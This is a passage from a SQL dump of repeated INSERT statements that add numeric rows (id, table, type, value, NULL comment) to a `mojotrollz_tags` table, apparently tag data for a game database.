VALUES (16795, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16795, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16795, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16796, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16796, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16796, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16796, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16796, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16797, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16797, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16797, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16797, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16797, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16798, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16798, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16798, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16798, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16798, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16799, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16799, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16799, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16799, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16799, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16800, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16800, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16800, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16800, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16800, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16801, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16801, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16801, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16801, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16801, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16802, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16802, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16802, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16802, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16802, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16803, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16803, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16803, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16803, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16804, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16804, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16804, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16804, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16805, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16805, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16805, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16805, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16806, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16806, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16806, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16806, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16807, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16807, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16807, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16807, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16808, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16808, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16808, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16808, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16809, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16809, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16809, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16809, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16810, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16810, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16810, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16810, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16811, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16811, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16811, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16811, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16811, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16812, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16812, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16812, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16812, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16812, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16813, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16813, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16813, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16813, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16813, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16814, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16814, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16814, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16814, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16814, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16815, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16815, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16815, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16815, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16815, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16816, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16816, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16816, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16816, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16816, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16817, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16817, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16817, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16817, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16817, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16818, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16818, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16818, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16818, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16818, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16819, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16819, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16819, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16819, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16819, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16820, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16820, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16820, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16820, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16821, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16821, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16821, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16821, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16822, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16822, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16822, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16822, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16823, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16823, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16823, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16823, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16824, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16824, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16824, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16824, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16825, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16825, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16825, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16825, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16826, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16826, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16826, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16826, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16827, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16827, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16827, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16827, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16828, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16828, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16828, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16828, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16828, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16829, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16829, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16829, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16829, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16829, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16830, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16830, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16830, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16830, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16830, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16831, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16831, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16831, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16831, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16831, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16832, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16832, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16832, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16832, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16832, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16833, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16833, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16833, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16833, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16833, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16834, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16834, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16834, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16834, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16834, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16835, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16835, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16835, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16835, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16835, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16836, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16836, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16836, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16836, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16836, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16837, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16837, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16837, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16837, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16838, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16838, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16838, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16838, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16839, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16839, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16839, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16839, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16840, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16840, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16840, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16840, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16841, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16841, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16841, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16841, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16842, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16842, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16842, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16842, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16843, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16843, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16843, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16843, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16844, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16844, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16844, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16844, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16845, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16845, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16845, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16845, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16846, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16846, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16846, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16846, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16847, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16847, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16847, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16847, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16848, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16848, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16848, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16848, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16849, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16849, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16849, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16849, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16850, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16850, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, 